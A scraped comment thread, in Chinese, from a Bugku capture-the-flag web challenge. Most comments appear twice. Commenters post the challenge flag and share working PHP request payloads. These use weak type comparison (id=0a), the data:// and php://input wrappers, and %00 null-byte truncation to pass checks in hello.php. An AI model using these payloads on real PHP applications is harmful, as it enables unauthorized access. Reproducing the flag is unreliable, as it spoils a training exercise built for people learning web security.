五边形战士
flag{bb25f9ec286ae9753bb12e5631da7f1e}
66
难点1.源代码里1.html文件查看跳转bugku导致1.html的源码不容易被捕获,我看了wp用bp抓了n次才抓到。我这种菜鸟根本想不到view resouce。2.抓到源码后的解码要先url解码再base再url才能解出来代码;我擦这一步我不看也做不到。3.这步最难,代码审计,发现id=0,用弱比较,id=0a;a的值来自data直接协议data://text/plain,bugku is a
第一步一开始的思路真的很重要。反而感觉后面的代码审计不是难点了;
hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd postdata:bugku is a nice plateform!
参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!
flag{我就知道有人投机取巧}
...
评论
1969901506 4天前
举报
五边形战士
coldplay99999 1月前
举报
flag{bb25f9ec286ae9753bb12e5631da7f1e}
26ww 1月前
举报
66
不会写代码的菜鸟 5月前
举报
难点1.源代码里1.html文件查看跳转bugku导致1.html的源码不容易被捕获,我看了wp用bp抓了n次才抓到。我这种菜鸟根本想不到view resouce。2.抓到源码后的解码要先url解码再base再url才能解出来代码;我擦这一步我不看也做不到。3.这步最难,代码审计,发现id=0,用弱比较,id=0a;a的值来自data直接协议data://text/plain,bugku is a
Jiafeng 5天前
举报
第一步一开始的思路真的很重要。反而感觉后面的代码审计不是难点了;
loulegedadong 6月前
举报
hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd postdata:bugku is a nice plateform!
不懂就问 9月前
举报
参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
一路奔腾 11月前
举报
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
xawm 12月前
举报
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
miaolegecui 1年前
举报
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!
1.23 1年前
举报
flag{我就知道有人投机取巧}